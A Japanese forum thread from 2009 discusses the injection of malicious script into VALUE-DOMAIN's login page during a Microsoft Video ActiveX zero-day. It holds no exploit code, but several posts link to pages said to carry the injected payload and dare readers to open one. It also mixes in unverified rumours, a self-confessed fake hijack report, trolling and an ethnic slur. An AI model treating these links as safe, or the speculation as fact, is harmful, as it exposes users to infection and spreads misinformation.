　Microsoftによると、脆弱性はVideo ActiveX Controlに存在し、Windows XPとWindows Server 2003が影響を受ける。Internet Explorer（IE）を使って悪用された場合、ユーザーが何もしなくてもリモートからコードを実行される恐れがある。

　SANS Internet Storm Centerによれば、この脆弱性を悪用するコードが中国の多数のWebサイトで公開され、それを使った攻撃が多発。何千ものWebサイトが改ざんされ、閲覧しただけでマルウェアに感染する状態になっているという。

　Microsoftは現在、脆弱性を解決するためのセキュリティアップデートを開発中。当面の回避策として、脆弱性のあるActiveX Control（msvidctl.dll）にキルビットを設定する方法を紹介している。自動的にこの回避策を適用できるツールも用意した。

　また、米McAfee、Symantecなど主要セキュリティ企業はウイルス対策ソフトの定義ファイルを更新し、今回の脆弱性の悪用コードを検出できるようにしたと発表している。

さすがに基幹までのっとられるようになったら終わりだな

ここの外注も中華系だよね？
ったく・・・ 前のウイルスの件で懲りなかったのかよ・・・

よく分からんけど
感染対象はIEで、vistaでは対象外って事でおｋ？

ここの、
その後の正規サイト改ざん〔後篇〕(3):新たな攻撃手法〜「新Nine Ball」「8080」
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1936

ここ読んどけ。
●「8080」：大量ドメインを使用する8080攻撃

2009.07.02
セキュリティ強化について

ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

配下サイトが全滅、恐怖の共有サーバー丸ごと改ざん〜「5+1」件の事例報告
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1938


いやー、こわいねー

まさに今回のはデジロ狙い撃ちでしょ？

この業界で商売してて狙われてあっさり撃たれるデジロ…orz

非常にお伝えしにくいのですが、実はVALUE-DOMAINのログインパスワードは、
ハッシュ化されていない、プレインテキスト記録なので、login.phpの書き変えが可能なら、
DBパスも取られているはずなので、もう既に全ユーザーのパスワードが割れて
いることになるのです。

だとしたらlogin.phpを改竄する意味は？

デジロ、login.php の書き換え事件についての公式声明を早く出せ。
これでも、だんまり戦術が通用すると思っているのか？

いつも通り放置してるだけですけどね

鉄壁なマイペースｗ

久々に来てみたら大変な事になっているじゃないか
今度のは今まででも最強だな・・・
ｵﾜﾀ

>>194
無差別攻撃で落ちたもののひとつなだけじゃないかと
まだ発覚してないところがありそう

今までも相当酷い障害はあったけど確かにこれは過去最強最凶クラスだ
これで実際の被害報告なんかが出だしたらニュースサイト巻き込んで七夕祭だなｗ

去年くらいから特に目だって続くこのデジロックの崩壊具合ったら何なの

>>194
動作からすると、感染経路はGENOとほぼ同じじゃないのかな。
そこから個別にlogin.phpに仕込むとか。。。ね。
ドメイン見れば美味しいエサってのはすぐ分かりそうだし、
domainでフィルタ読みされればイチコロ？

とりあえずセキュリティホールmemoに取り上げられたから、かなり知れ渡ってるさ。

何日の時点でログインしてたらアウト？

ところでまだ捏造を唱える社員の火消しは来ないの?

ここ2〜3日はそれどころじゃないみたいだぞｗ

とりあえず安心して管理画面に入れない様じゃ何もできないんだが…

IPAも出ました〜
ttp://www.ipa.go.jp/security/ciadr/vul/20090707-ms-activex.html

とりあえず、管理ドメインを、enomのアカウントにプッシュしておいた。

さらに、enomアカウントのパスワード、メールアドレスを変更。
ロックもかけといた。

少し安心。。。

ソースは２ちゃんって困るし詳しくない人もVD使ってるから公式にアナウンスだしてくれないだろうか

こっそり消すようなところに期待しても無駄かと。

SymantecによるとIE8だと大丈夫そうな…ほんとやろか。
http://itpro.nikkeibp.co.jp/article/NEWS/20090707/333313/

FirefoxでVDの管理画面に入るのは、IEでないから大丈夫なの？
それとも同じく危険なのかな？

php改ざんの可能性が否定できない今、ブラウザは関係ない

>>216
本質を分かっていない奴はけーん

そーすが２ちゃんだけだと誰にもおしえれんやろー！

バカしかいないようだ

要するにもう安全ってこと？

IE6/7以外のブラウザなら問題ないんだろ
Firefoxなら大丈夫だろ

ﾏｶｰで良かったﾅﾘ。

phpがなんだとかいってるのは関係ないんだ
で、phpってなに？

本じゃない？

出版社

Vistaなら大丈夫なのか、よかった
ようするにウイルス埋め込まれたってこと？
感染しないなら関係ないや

ブラウザはXP、2003以前のIEだと攻撃を食らう
だから、それ以外でログインしてるなら、埋め込みスクリプトからは身を守れる

しかし、ログインフォームが改竄され、デジロ広報が把握してない誰かの手によって修復されたのが、現在残る懸念材料
こう易々と改竄されているとなると、一見正常なログインフォームでも内部をいじられている可能性がある
だから、正式アナウンスが出てないうちは安易にログインしないほうがいいって話だ

よくわかんないけど、IE6/7はウイルスに感染するし、
かといって、ほかのブラウザでアクセスしても、こっちのブラウザに関係なくvalue-domain.comのサーバのほうで
何か情報送信とかしてるかもしれない、そんな二重の構えで待ち伏せされてる状態ってこと？

co.ukとorg.ukのドメイン持ってるけど
移管できるとこがのきなみ高いっていうね…
こりゃ参った

情報源が2chなんて信用できんな
捏造かもしれん

テンプレの３、４って、どうなの？

login.php を変更したのが、誰なのか分からない内は、ログインすること自体が危険
デジロがlogin.phpの改ざんを発見して対応修正したのなら、まだいいが、
もし修正したのが「デジロ」なら、公式にアナウンスが来て当然
公式アナウンスが無い＝不安要素一杯　ということ。

これは、他社の捏造ですよ。気にすることない。安全安全。

firefoでよかった！

もうちょっと上手く釣ってくれよ
あまりに白々しいとつまらんよ

このスレに名うての釣り師なんていないと思う

２ちゃんねるの情報は信用ならん
どっかのニュースサイトに取り上げられたら信用する

３，４は今見たらエラーページになってた
昼、見たときは見れたんだけど
焦ったけど、一応>>85-86のコードはないみたい
じゃあ>>180は

なんだただの捏造か

>>92の魚拓の中にドメイン移管方法ってページがある
>>ttps://www.value-domain.com/howto/?action=transfer
これで、どうでしょう？

魚拓は開かないほうがいい
ウイルスいるから

定期デジロマンセー厨は、ガチ社員とアンチ煽り基地外がいるよね
今湧いてるのは後者の方だね

なにもなかった、捏造捏造、気にすることはない、デジロのセキュリティは鉄壁

まあこのまま大した実害報告もなく終息すれば例の如く公式アナウンス無く終息コースだね。

実害出なきゃ騒ぐ事でもないし。
ただ今回の件は事が事だけに、今後の成り行きはどうあれ何らかのアナウンスは必要だろうな。

今のところ特にVDユーザーでサイト改竄されたとかの被害報告ないよね？

被害報告ないし大丈夫でしょ
ログインページが改ざんされた程度だし

実害がないなら、アナウンスも不要
このスレ、早く埋めましょう

揉み消し工作してんじゃねぇよ

少なくとも昨夜から未明あたりに居たスレ住人は、検証してくれたり参考URL貼ってくれたり不明な点を解説してくれたり、
（デジロが法に触れるとか言いつつ根拠を問うとググレカスの一言で逃げた奴も居たけどｗ）
概してまともな書き込みが多かった気がするのだが、一晩経つと、こうも違うんだなぁという妙な感慨。
まぁ、予想通りだけどｗ

実害が今のところ報告されてないから… だけどね。あくまで。

どうあれデジロからの公式アナウンスが無いとおちおち管理画面にログインできないって状況は変わらないから、現時点で問題にすべきはその辺だろう。

まあ、少なくともlogin.phpが改竄されてたのは事実なんだし
それなら>>167の言うとおり登録ﾕｰｻﾞｰが５０００以上なら
報告しなければ違法になる。

今回は、閲覧者のPCに対するウィルスの仕込みと、ログイン時のパス抜きの二段構え。

パス抜きがいつぐらいに仕組まれたかが問題だな。

実害がないとか言ってるけど、おまえらパス抜きクラッカーが即行動起こすと思ってるのか？ｗ
最近はばれない様に暫くトラッキングして他の情報もぶっこ抜いてるんだぜ
被害が公になるのは数ヵ月後だ、潜伏期間が長いのさ

だからこそ現時点での中間報告でも デジロからの公式アナウンスが必要なんだけどな

認知した事すらアナウンスしないんだから ちょっと酷すぎるよいくら何でも

>>252
GENOもそうだった

>>211はeNomからアカウント変更したみたいじゃね
テンプレの３、４って、どうなのよ？

またオナニストか

テンプレの3、4のやり方ではドメインプッシュはできない。

原爆と同じ流れなのに釣られる人ってなんなの！

本当ならフォーラムで大騒ぎだろ

実は全部がせなんじゃね
魚拓とかウイルス報告も捏造とか

>>240は？
魚拓からだとコードがあるけど
直接とべばソースにはコードなかった
>>151,187にあるように XPとWindows Server 2003
IEが攻撃対象ということだから
誰かドメイン持ってる人でVista、IE以外の
ブラウザの人やってみてくれないかな

おまえそのレス連射パターン定番だよな
いちいち構ってあげたから、次からは少し目新しいのにパターン変えろよ

馬鹿はとりあえず過去レスに目を通せよこの馬鹿

アクアナがおかしいんだけど

アグネス(チャン)のがおかしいです

エラーページだけど、すでに修正済み？
キャッシュのほう見ればいいの？

問題無し、既にセキュリティ修正済、デジロ最強
捏造にだまされるな。

>>214
だめだと思う。「IEの」脆弱性じゃないし、一番詳しいはずの製造元の
MicrosoftセキュリティアドバイザリでもOS(XP・2003がやられる)にしか触れてない。

今度はsageで社員乙といいたいんですね。わかります。

もう、さくらにするお(´；ω；`)

なぜわざわざ高価なさくら? 普通はムームーとかFC2じゃない?

上場企業だから？＞さくら

一気に収束しててわろたｗオナニスト乙ｗ

冗談だお。VD最高だお（ ＾ω＾ ）

デジロ最強(^^)/

>>271
さくらも去年別な手法(ARPスプーフ。サーバのコンテンツ改竄ではなく
経路上での改竄。FTPで見ても正常なのでわかりにくい)でやられてるよね。
ttp://www.sakura.ad.jp/news/archives/20080602-001.news
ttp://www.sakura.ad.jp/news/archives/20080605-002.news

今日の昼頃と夕方にログインしちまったけど大丈夫かな。

結局いつものうやむやか。orz
まともにしたら金かかるのは分かるがここまでコスト掛けないのも徹底してるな。
入金処理／コピペ対応人員だけで今回も乗り切ろうと？

2chデジロ関連スレ工作&会話誘導要員のコスト計上を忘れてますよ

フォーラムに書き込んでこいよ

フォーラムからログインして意味あるの？
ソースにコードはなかったけど

誰もフォーラムに報告をしていない
つまりはそんなことはなかった
２ちゃんねるだけの現象

あんなクローズな空間でクローズなやり取りしてどうすんだよｗ
つか今サポ板も何か辺だぞ

>>283

見えない敵と常に戦い続けないといけない性分って大変だね・・・
何がしたいの？ 話聞いてあげるよ。

じゃあこれも無かったことなんだな
http://wepawet.cs.ucsb.edu/view.php?hash=c060c4c4a3c128706441effa96466c15&t=1246871592&type=js

やっばついこの間にムームーに移管しておいて正解だったな。
まあ俺は大丈夫だけど最悪ドメイン乗っ取られたり、
勝手にドメインを売買されたりするかもな。

>>284
何か変って？書き込めないとか？

これか？
https://muumuu-domain.com/?mode=transfer

騒ぎになってるから見に来たんだが
ネームサーバがボロボロになってるってマジ？？
ドメイン管理提供しててありえないだろ
どうなってんだよこの会社は

もうログインしても大丈夫なのか？
そもそもソースを改鼠されるってどんな状況なんだよ

ネームサーバがボロボロって、もう丸一ヶ月経つぞ。
login.phpの改ざんの件が目下の最重要問題。

ログインしても問題ないかどうかは神のみぞ知る。

なんか出張行ってる間にずいぶんスレが伸びてると思ったらえらいことになってるんだな。
まあ、俺は常時javascriptはoffにしてるから今回の問題は関係ないけど。

あ、支払いの時だけはjavascript許可しないと動作しなかったのでonにしたけど、かなり前の話しだし。

クラッカーがPHPを自由に改ざんできたとすると、
パスや個人情報を引き抜き放題だった可能性があるな。
そうだった場合どうなることやら。

話をすりかえるのに必死なのがいるなｗ

>>293
クライアントPCは無事かもしれないけど無関係とはいえないよ

つかPHP改竄できたのなら
個人情報ぶっこ抜きとか簡単にできるじゃろ
ろぎんしてないから関係ないよね(ｷﾘｯ
って何アホなこと言ってんだよ

なんかドメイン乗っ取られたっぽい。サイトが変な広告サイトになってる。
whoisしても全く知らん所になってるし。
あとなんかログインできなかったからパスワード再発行したけど梨の礫。

もうだめぽ。

>>298
デジロユーザーざまぁｗｗｗｗｗｗｗｗｗ

>>298
いよいよ実害報告ですか
もうちっと詳しく教えていただけませんか？

>>289は>>104あたりでダメなのか
>>293
よく分からん。>>151ならAdobeReader、FlashPlayer最新バージョン、
javaスクoffならログインしてもいいのか
なんか別のとこで、それではダメだったケースがあったが
念のためブラウザＩＥ以外にしといたほうのがいいのか
それでは、まるっきりＧＥＮＯといっしょだが
自分では確認できんので、どうしようもない

>>298
釣りじゃないならもっと詳しい情報を

0-day攻撃だったのは分かるんだが
どうやってlogin.phpに仕込んだのか謎のままだな

>>300
さっきサイトを確認しようとしたらサイトが変な広告サイトななってて、
whoisで確認したらIPから所有者情報まで全部書き変わってた。

あとログインしようとしてもできなかったんでパスワード再発行したんだけど、
そのメールも全く届かない。

サポには連絡したけどどうしようも無い状態。

気になって一応うちのドメインサイト全チェックしたけど問題なし。

>>304はとりあえずトリップつけてくれ

>>304
乗っ取られたっていうドメインさらしてくれないと
釣りかどうか判断できんのだが

>>301
>>151とか上のほう少しは読めよ

最後にログインしたのはいつ?
該当期間中にvalue-domain.comで何か設定変えた? (クッキー抜かれた?)

>>304
やふーやぐーぐるはどうなりますか？
なんらかのウイルスに感染しててちがうとこ見に行ってるとか
あるかもしれない

ネタかマジか全然わからんしなあ

>>304
以下の情報も教えてほしい：

(1) TLDは何? .com? .net? .jp?

(2) 有効期限はいつまで?

ドメインロックしてたかどうかとか。

ネタでしょ、登録期限切れだったというオチかな、

本当なら大事件だ。ありえん。

つーか釣りじゃねーの？
タイミングよすぎるだろ。

こんなけ騒いでるのに国から指導とかされないから
アンチが騒いでるだけなんじゃないかと思ってしまうんだが、、

> whoisで確認したらIPから所有者情報まで全部書き変わってた。
がネタ臭い

悲惨な事になってるな。
仕事でも使ってるのに、洒落にならん…

少し高くても別のところにするしかないかなぁ…

>>317
確かに. WHOISにIPは普通出てこない.

>>316
ログインフォームを改ざんされたのは事実
個人情報抜かれた可能性があるのも事実

だから、ドメイン何よ、
既に登録内容変わっているなら、さらしてもなんら問題無いでしょ。

>316
> 国から指導とかされないから

そんなに速攻で動くわけないだろハゲ

単一報告では釣り臭さが拭えないね
まあ昨日今日だけでもコンパネログインした人間も相当数いるだろうから今後どうなるか

とりあえず糞デジロ何かアナウンスせいよｗ

実は釣りでした。
食いついたおまいら涙目ｗｗｗｗｗｗｗ

世界的なニュースになるけで、そんなネタには釣られませんが。
レジストラ/代行がそれやられちゃうと、核爆弾並みの被害ですわ。

>>307
ActiveX コントロールを殺しとけばＩＥでもいいのか
＞レジストリにkill bitを立てるか、以下の「Fix it」を押しましょう。
ttp://support.microsoft.com/kb/972890/

>>324
誰も釣られてないだろ
具体性の無い文章で釣ったつもりか？

所詮は後釣り宣言

つーか釣りだろ
whoisでIPわかるはずないし
あとさっきから報告の続きないし

>>325->>329
まあまあ
デジロ社員じゃない方の例の子っぽいからもっと愛に溢れたレスを沢山つけてあげて下さい・・・
お世話かけさせますけどすいませんね

　　　 　 ,――――――ヽ、
　　　,／　　　　　　　　　　　~＼
　 ／　　 ,へ＿Vへ＿＿　　　　~＼
／　　　ノ　　　　　　　　 ゜ー-、　　`ヽ
|　　　 ﾉ /￣＼　　　／￣~ヽ　ヽ 　　 i
|　　 ノ　　　　　　　　　　　　　　|　　ノ
＼　 |　　＜●＞　　＜●＞　 （　 ）
　＼ |　　　　　 ｜　|　　　　　　 i /
　 　 |　　　　　 /　　ヽ　 　 　 　ﾚ そろそろ僕の出番ですね
　　　i　　　　　（●_●）　 　　　 / ＩＰＡの誇りをかけて
　　　 i、　　　 ,-――-、　 　・ / ValueDomainを
　　　　i、　　<（EEEEE）>　∵/
　　　 　 i、 　 ＼＿__／　　_/ まピョーん☆
　　　 　　 ＼　　　　　　 ,ノ
　　,,.....イ.ヽヽ、ー-―一ノﾞ-､.
　　:　 　| 　';　＼_____ ノ.| ヽ　i
　　　 　 |　　＼/ﾞ（__)＼,| 　i　|
　　　 　 ＞　　 ヽ. ハ　 | 　 |｜

デジロックの技術水準っていうか、レベルの判定って難しい気がする。
ネームサーバーだって、ハッキリ言えば、どこでも危険で、bindの話しだし、
login.phpが書き換えられたってのは、本当にどんなセキュリティを突かれたのか、
興味深いな。
確かなのは、zendでコンパイルしていないっぽいのと、何からの
穴があったとのでは？と推測の領域。ディレクトリをdigできる様なアップロードするような
仕組みがあったと思えないんだよな。FTPなんか空いているわけないし、
不審な部分と言えば、決済の外部業者渡しくらい？
しかし、これもクレカの処理を内部で行っていない分、セキュアだしな。

> FTPなんか空いているわけないし 云々

なぜ言い切れる？

先月のイベントでムームーに逃げて良かった…と思いたいが…
XREA+の更新時期なんだよ〜
やべぇ
閉鎖もできん…

>>333
俺なら閉じる。
百歩譲って、FTPSでお願いします。

まっとうなネットサービス系の会社ならFTP開けたりせんのだけどな

まっとうなら、な。
そんなの百も承知で聞く。

なぜ言い切れる？

普通に外注のシナチク技術者の仕業かなと思ったんだけど
それだったらlogin.php弄る理由がないんだよね…

>>337
> $ ftp www.value-domain.com
> Connected to www.value-domain.com.
> Connection closed by remote host.

>>337
統計的な話になるのだが、この種の事故の大部分は
サーバーサイド言語で作られたプログラムの穴が大半です。
ポートの穴やハード的な原因は最後の最後に疑うべきというのが、
今風じゃないのかな？

>>339
おいおい、FTPデーモンがおるやんけ　汗

login.php、login.phpって言ってるやつ、ちょっと必死すぎない？

login.php、login.php

SSHじゃなくて、telnetが開いていたに１票

そういやユーザーフォーラムには誰も投稿してないよね
必死なのは２ちゃんだけだな

>>339
他からうpできる穴がある可能性は？

すべてのことが釣りだった場合は、釣られた。

ユーザーフォーラムに行くのですら危険だと思ったら、投稿されていなくて当然だろう

>>346
イワユル、ウェルノウンポートと言われるポートでは、難しいので、
そうじゃない、ポートとか？
DNSが開いていてもそう簡単には掘れないと思うし、対策済みかと

>>345
キーロガーの存在に気がつかなかった可哀想なユーザーが、いつも通りログインし、ユーザーフォーラムを使っているのだよ

telnetとかftpあけたままとか・・ど素人なのか？
技術者が抜けて今や素人だけで運営してるとか？

知ってる奴はヤバいのでフォーラムに近寄らない
↓
誰も警告を発しないし、当然デジロからのニュースリリースも無い
↓
知らない奴は普通にフォーラムに書き込もうとログイン
↓
マルウェア増殖、仕掛けた奴(ﾟдﾟ)ｳﾏｰ

とこういう自体な訳だな

昨日、リアルタイムで改ざんされてたの見たけど、
魚拓とか、それに続く状況報告とか、詳細まで踏み込まれはじめたときに、
ふと気づいたら改ざん部分が戻っていたんだよな

せめて改ざんへの対応をしたのか否かくらいは早く告知ほしいが、
その告知がでたところで、この状況じゃ、告知それ自体が改ざんかもしれない

ちょっと質問なんですが、
ユーザーサポートの
http://sb.xrea.com/
vBulletinが改ざんされたってことでしょうか？
value-domainのloginがやられたかと思ってたよorz

>>354
value-domainのloginページが改ざんされていた
現在は修正されているが、告知はない

>>355
それなら告知すべきことですね。ヤバイレベルです。
vBulletinはOSSなんでセキュリティホールもあり得るので。

value-domain.comのlogin.phpを書き換えられる環境にある奴が
sb.xrea.comのvBulletinのログインに手出してないと考える方が甘いって事だろ

login.php自体が書き換えられたかは未だ不明でしょ?

真偽確認＆アナウンスするはずの対応部署とやらに連絡がいったとされる時間から、もうすぐ２４時間

さて、これは告知まで何日かかるかな

>>358
それはともかくlogin.phpにリクエストを出して戻ってきたコードに埋め込まれていたのは確か

今でもその改竄された時点での魚拓とかある？

>>361
>>92がまだ見られるんじゃないかな

改竄事件は、他社工作員の捏造。。気にする必要なし。
デジロのセキュリティは万全。

>>363
今日は遅出勤務なの？
何時まで？

いまだ何もアナウンスがないなんて企業としてどうかしてる。

>>354のサポートページ自体はソースに
>>31-32の変数コードなかったけど
ログインしてみないと、その先は分からないからな
フォーラムもトップは大丈夫だけど
ログインしてみないと分からない

>>362　　
魚拓はコード残ってるから開かないほうがいい

何もなかったから、アナウンスなど無くて当然。
これは、捏造事件です。

>>367
隠蔽する気マンマンだなぁ

公的ぽいところに届出が無い限り、
がせだと思って良いかな？
http://www.ipa.go.jp/security/

釣りにマジレスするのもなんだけど
ガセだ捏造だと主張する人は
魚拓もグルだと言うつもりなんだろうか

土下座しろとかは言わない もともと、ここはプロかハイアマが使うんだから、
淡々と、しかし正確に事実関係とか告知すれば足ると思うし、かつ必要だと思うんだ

>>370
釣りにマジレスすんなよ、と言わせていただこう

スラッシュドットジャパンでよければ
ttp://slashdot.jp/firehose.pl?op=view&id=117594

>>360
それはともかく　て。違いが分からないの？

徐々にニュースサイト系に情報広がってるね
これがVD流の七夕祭りですか

>>369
脆弱性有無の調査方法
DNSキャッシュポイズニングの脆弱性の有無を確認
http://www.ipa.go.jp/security/vuln/documents/2008/200809_DNS.html

* porttest.dns-oarc.net -- Check your resolver's source port behavior
* https://www.dns-oarc.net/oarc/services/porttest

* txidtest.dns-oarc.net -- Check your resolver's transaction ID behavior
* https://www.dns-oarc.net/oarc/services/txidtest

* IANA ― Cross-Pollination Scan
* http://recursive.iana.org/

この３つで確認すればいいのかな？

さっさと仕事しないとGENOウィルスみたいにウィルスの名前になるとかすっげえ不名誉なことになる悪寒

コードは確かに書き加えられてたよ。
ここに貼られてたソースもハッキリ見た。

昨夜９時頃ログインしたが今のところ何ともない。
今後どうなるかはわからんが...
明日俺のサイト書き換えられてたりして...orz

「VDウイルス」
「デジロウイルス」

悪くないな

コードが書き換えられていたのなら、

それを修正対応処理した時点でデジロが何かアナウンスして当然でしょ。
アナウンスが無いのはコード書き換えなど無かったからです。
他社工作員の捏造にだまされないように、

>>376は全然ちがったみたい
>>369見る前はこれかと思ったんだけど

でも、ログインは関係ないのか？
もしかして、ServerとClientは
別物と何度言ったら(nyってやつ？

>>380

ﾉｼ >>286

>>286の読み方がわからない

隠蔽しようと頑張ってるとしか思えんわ

なんだかすごいことになったみたいだね
よりによって久々にDNSいじるためにおととい昨日今日とログインしたというのに…
firefoxだけど大丈夫なのかしら

>>340
まあそういう穴もあるんだがGeno系は違う場合もあるからねえ
今回もアプリよりFTPとかそっちを疑ったほうがいいのかもしれない
Genoのときもそうだったけど被害サイトが特定のCMSや
Webサーバじゃなかったんで最初混乱した

データを抜いたんじゃなくてPHP書き換えちゃってるんだしね
こういう流れも考えられるよってかんじで参考程度だけど
中の人のPCがGeno系に感染→FTPパスとられる→サーバ側改ざん(新型うめこみ)

>>385
ログイン処理の部分で書き換えられていたならばアウト
報告が無いのでどこまで書き換えられたかは判らないが。

>>385
FirefoxであればAdobe製品を最新にしていれば
クライアント側は大丈夫かもしれない

>>387
そうなのか…ありがとう
JSは大丈夫だったとしてもログイン処理のほうが問題だよね
こればっかりはどうしようもないから報告待ちするしかないなぁ…

>>388
GENOの件でReaderとFlashPlayerは最新のはずだからそこは大丈夫そう
教えてくれてありがとう

去年改ざんされた広告サーバのIPアドレスを逆引きすると、sakura1.digi-rock.com。
今回改竄されたVDのサーバが、sakura2.digi-rock.com。
また、さくらインターネットに置いているサーバだな。

>>388
いや、Adobe製品・・・というか全てのリッチコンテンツ用プラグインを削除しないと安心は出来ないだろ。どうせまだ穴があるに決まってる。
HTML/JavaScriptパーサバグは流石にもうIEくらいしか食らわないだろうけど、プラグインは枯れるどころか不安定機能が絶賛増加中なわけで

('A｀)ｱｱｱｧｧｧｧｧｧｧｧｧｧｧ....
.
三年寝太郎の俺が
久しぶりに土曜日からずっとアレコレやってたらこの騒ぎ。。。

流し読みだけど↓で合ってる？


　login.phpが書き換えられた。
　
　�@ 変なJavaScriptが埋め込まれてる。
　　　　→ 変なActiveXが実行される。
　　　　　→ IEの人は要注意。（魚拓も危険）
　　　　　　→ ともかく全員これを当てておけ。 ttp://support.microsoft.com/kb/972890
　
　�A login.phpが書き換えられたって事は…
　　　　→ ログイン危険。
　　　　→ というか、何もかもやばいだろ＼(＾o＾)／

>>392
そんなあなたにFirefox+NoScript(フレーム禁止も設定で追加)

>>394
既にOperaの標準機能でプラグイン停止して運用してる
外部拡張に頼らず本体機能だけでプラグインのON/OFFを切り替えられるから、そういう意味ではかなり便利

>>394
ドメイン毎に設定できるのが魅力だけど
許可サイトに加えていくなど、ある程度熟練した人向けだと思う
しっかり設定しないと、動画も表示されないからね

>>393
変なActiveXだけじゃなく変なPDFと変なSWFもあったみたいだよ
どれかにヒットすれば感染おめでとう

サーバ側についてはGenoと同じでなかったことにしようとしてるみたいだね
価格.comの改悪型Genoメソッドだ

他の攻撃サイトでもIEをターゲットにしているものは多いし
IEをメインブラウザとして使うのは危ないね

　　　　　　　　　　　　 ／）
　　　　　　　　　　　／／／）
　　　　　　　　　 ／,.=ﾞ''"／
　　　／　　　　 i f　,.r='"-‐'つ＿＿＿_　　　キャッシュ消せばいいんだよ！
　　/　　　　　 /　　　_,.-‐'~／⌒　　⌒＼
　　　　／　 　,i　　　,二ﾆ⊃（ ●）.　（●）＼
　　　/　 　　ﾉ　　　 ilﾞフ::::::⌒（__人__）⌒::::: ＼
　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　　|r┬-|　　　　　|
　　　　　/　iﾄヾヽ_/ｨ"＼ 　　 　 `ー'´ 　 　 ／

thx、何でGENOの話をしてるのか分かってなかった。
pdf,swfもあったのね。


　login.phpが書き換えられた。
　
　�@ 変なJavaScriptが埋め込まれてる。
　　　　→ 変なActiveXが実行される。
　　　　　→ IEの人は要注意。（魚拓も危険）
　　　　　　→ ともかく全員これを当てておけ。 ttp://support.microsoft.com/kb/972890

　　　　→ 変な pdf と swf を読まされる。
　　　　　→ 例のGENO系。既に最新のAdobeReaderとFlashPlayerになってるよな！？
　　　　　　→　Adobe製品は自動更新間隔の期間が長いので、常に自分で最新を当てにいけ。
　
　�A login.phpが書き換えられたって事は…
　　　　→ ログイン危険。
　　　　→ というか、何もかもやばいだろ＼(＾o＾)／

>>396
そうなんだよね
わけわかめな人についてはNoScriptは入れないほうが良いとおもう

ただ、IEが一番狙われてるのは確実だからNoScriptなしでも
Firefox(その他のブラウザ含む)のがマシと考えられる
Firefoxに関してはGoogleセーフブラウジングである既知の危険ドメインは
カットできるんでそういう意味でも多少安全
IE8にもそういう機能がついてるけど踏まないと報告できないようなので
少なくとも一回罠にかからなきゃいけないんだよね・・・
それとも見落としていただけで報告サイトあるんだろうか

どっちみち今回のような未知のドメインには対応してないので基本的な対策は必要だけどね

ただ、Firefoxが良いから使えっていうポジティブな理由じゃなく
IEが危なすぎるからやめろっていうネガティブな理由なんで他ブラウザでも構わない
Google Chromeはたとえブラウザの脆弱性があったとしても
サンドボックス化されていて実行する権限が無いので動かないみたいな話だったかな

このあたりに今回の件が書いてある
ttp://ilion.blog47.fc2.com/blog-entry-140.html
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/07.html#20090707_tuiki
ttp://lineage.paix.jp/guide/security/virus-site.html#VALUEDOMAIN

>>399
ここの人は大丈夫だと思うけど、念のためGeno関連補足
AdobeReaderに関しては今後また狙われそうなJavaScript機能のオフ推奨
また、Reader自体使用していないならアンインストールしたほうが無難
メーカー製PCの場合は勝手に入ってることが多いので使用していなくても
インストールされていないか要確認

これってreader入れてなければflashプレイヤー入ってても感染しないの？

>>399
これってブラウザのスクリプト切ってても感染するの？

>403
だから FlashPlayer は最新にしろとあれほど

要するにAdobe私ねってことだ

>>405
してるよ。
IE6
flashplayer最新
reader無し

ttp://support.microsoft.com/kb/972890/
をやってないならアウト

>>408
やってないみたいだけど感染してるかどうかってどこで見分けるの？
GENOウイルスはレジストリエディタが立ち上がらなくなるって聞いたけど立ち上がるし
アプリケーションが糞重くなるって聞いたけど特に変化無いし
PeerGurdian2で見てても特に変な動きしてないみたいなんだけど。

動画見ないからそもそもフラッシュのプラグイン入れてないなｗ

横になったら寝てた
>>400
＞Firefoxに関してはGoogleセーフブラウジングである既知の危険ドメインは
カットできるんでそういう意味でも多少安全
寝る前に、そういうサイト踏んだら、そうなった
今IE7でやってみたら、危険なドメイン開いた
>>408やってなかったからか

>>409
バックドアかキーロガーだから見つかりにくいように作ってるだろう。
regeditが起動しないみたいなあからさまな挙動はない。
私は感染してないので、がんばって見分け方を見つけてね。

見分け方は、sqlsodbc.chmのファイルサイズの確認でしょう
>>411はただのエロサイトだった
それを今回のアドレスでやればいいのかな

うっかり砂箱の中で>>408やったらループった
試すアドレスは >>286のでいいのか
FireFox、Chromeはブロックしてくれたけど
IEが接続できなきないだけで、もう一つ分からない
IE８にしないと駄目か

IE8にしてみたけどInternet Explorer ではこのページは表示できません
って出るから、これだとブロックしてくれてるのかどうか分からん
うちのモデムの接続もともと不具合だし

なんでここがさくらのサーバ使ってんのかと思ったら、
自前のだと良く落ちるからかな？

で、結局何？今回の騒動は釣りじゃないのか？

なんか最近思うんだが、ムームードメインとお名前が必死じゃないか？

おれはムームーでのcomドメイン管理を止めた。

使い勝手の悪いムームードメインから
デザインが悪くても管理の楽なバリュードメインにしたよ。
おれと同じようなユーザーは多数いるだろうね。

今回の件、ムームー社員が工作しているように見えるから不思議。

それより、お前らどこに引っ越したんだよ

■Slashdot.jp
VALUE DOMAIN のログイン ページ改ざん
ttp://slashdot.jp/firehose.pl?op=view&id=117594

■リネージュ資料室
VALUE DOMAINログインページ改竄
ttp://lineage.paix.jp/guide/security/virus-site.html#VALUEDOMAIN

■セキュリティホールMEMO
バリュードメインでこの欠陥を利用した攻撃が発生
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/07.html#20090707_tuiki

早く公表してくれ


5000人以上の個人情報を保有しているだろうから法的に裁かれるぞ


今回の件ばかりは隠すことは出来ない


下手すれば・・・

ｺﾞｸﾘ...

釣られないぞ・・・

問題が発生した時点でのウイルス検体を拾った人が大勢いる
あとになればなるほど、返答に窮するようになるかもしれないのに、何をやってるんだ

zxshell晒しsage

おっと早漏

△ウイルス検体を拾った人
○ウイルス検体を(騒動を察知してわざわざ)拾いにいった人

中国か、GMOに身売りになったらイヤだな

デジロウイルスのアナウスまだぁ?

対策してて大丈夫な人、ここ見ても平気か試してくれよ
ttp://dnf.wikiwiki.jp/

ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.wikiwiki.jp%2Ferror%2F403.html&hua=
上のソースで問題の部分は./er/pr.phpだよね

どうしちゃったんだよVALUEDOMAIN…

>>428はURL間違ってね？

デジロックは公式アナウンスをしない気か？
GIGAZINEとか他のニュースサイトでも取り上げてくれれば、
ニュー速とかにスレが立って、デジロも無視できない状態になるだろうに・・・。

あー、乗り換えるのめんどうだし、デジロックには頑張ってほしいよ。

